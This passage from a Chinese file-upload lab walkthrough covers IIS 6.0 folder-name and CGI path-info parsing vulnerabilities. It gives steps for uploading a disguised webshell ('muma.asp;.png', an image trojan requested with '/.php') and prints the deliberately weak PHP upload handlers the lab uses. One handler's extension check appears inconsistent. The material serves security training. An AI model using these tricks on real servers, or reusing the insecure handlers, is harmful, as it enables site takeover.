&& in_array($extension, $allowedExts))
{
if ($_FILES["file"]["error"] > 0)
{
echo "错误:: " . $_FILES["file"]["error"] . "";
}
else
{
echo "上传文件名: " . $_FILES["file"]["name"] . "";
echo "文件类型: " . $_FILES["file"]["type"] . "";
echo "文件大小: " . ($_FILES["file"]["size"] / 1024) . " kB";
if (file_exists("./b/image/" . $_FILES["file"]["name"]))
{
echo $_FILES["file"]["name"] . " 文件已经存在。 ";
}
else
{
// 如果 upload 目录不存在该文件则将文件上传到 upload 目录下
$ret = move_uploaded_file($_FILES["file"]["tmp_name"], "image/" . $_FILES["file"]["name"]);
echo "文件存储在: " . "./b/image/" . $_FILES["file"]["name"];
echo "";
}
}
}
else
{
echo "非法的文件格式";
}
22、IIS6.0解析漏洞(三)
文件夹名漏洞:触发漏洞的命名方式:as.asp;.jpg
做题步骤
抓包修改文件名为:/muma.asp/asp.jpg或者修改为muma.asp;.png
源码分析
$allowedExts = array("jpg");
$time = time();
$temp = explode(".", $_FILES["file"]["name"]);
echo $_FILES["file"]["size"];
$extension = end($temp); // 获取文件后缀名
if ((($_FILES["file"]["type"] == "image/gif")
|| ($_FILES["file"]["type"] == "image/jpeg")
|| ($_FILES["file"]["type"] == "image/jpg")
|| ($_FILES["file"]["type"] == "image/pjpeg")
|| ($_FILES["file"]["type"] == "image/x-png")
|| ($_FILES["file"]["type"] == "image/png"))
&& ($_FILES["file"]["size"] < 204800) // 小于 200 kb
&& in_array($extension, $allowedExts))
{
if ($_FILES["file"]["error"] > 0)
{
echo "错误:: " . $_FILES["file"]["error"] . "";
}
else
{
echo "上传文件名: " . $_FILES["file"]["name"] . "";
echo "文件类型: " . $_FILES["file"]["type"] . "";
echo "文件大小: " . ($_FILES["file"]["size"] / 1024) . " kB";
if (file_exists("C:/Inetpub/wwwroot/c/image/a.asp/" .$time.".jpg"))
{
echo $_FILES["file"]["name"] . " 文件已经存在。 ";
}
else
{
// 如果 upload 目录不存在该文件则将文件上传到 upload 目录下
$ret = move_uploaded_file($_FILES["file"]["tmp_name"], "image/a.asp/".$time.".jpg");
echo "文件存储在: " . "./c/image/a.asp/".$time.".jpg";
echo "";
}
}
}
else
{
echo "非法的文件格式";
}
$allowedExts = array("jpg"); :只允许上传jpg文件
$extension = end($temp); : 获取文件后缀名,使用/截断
23、CGI解析漏洞
触发解析漏洞的命名:a.jpg/.php
做题步骤
直接上传图片马
访问时加上/.php,让他以php形式解析
源码分析
if (isset($_POST['submit'])) {
if (file_exists($UPLOAD_ADDR)) {
$allow_ext = array(".jpg",".jpeg",".png",".bmp",".gif");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //收尾去空
if (in_array($file_ext, $deny_ext)) {
if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
$img_path = $UPLOAD_ADDR . $_FILES['upload_file']['name'];
$is_upload = true;
}
} else {
$msg = '此文件不允许上传,仅允许[.jpg, .jpeg, .png, .bmp, .gif]!';
}
} else {
$msg = $UPLOAD_ADDR . '文件夹不存在,请手工创建!';
}
}
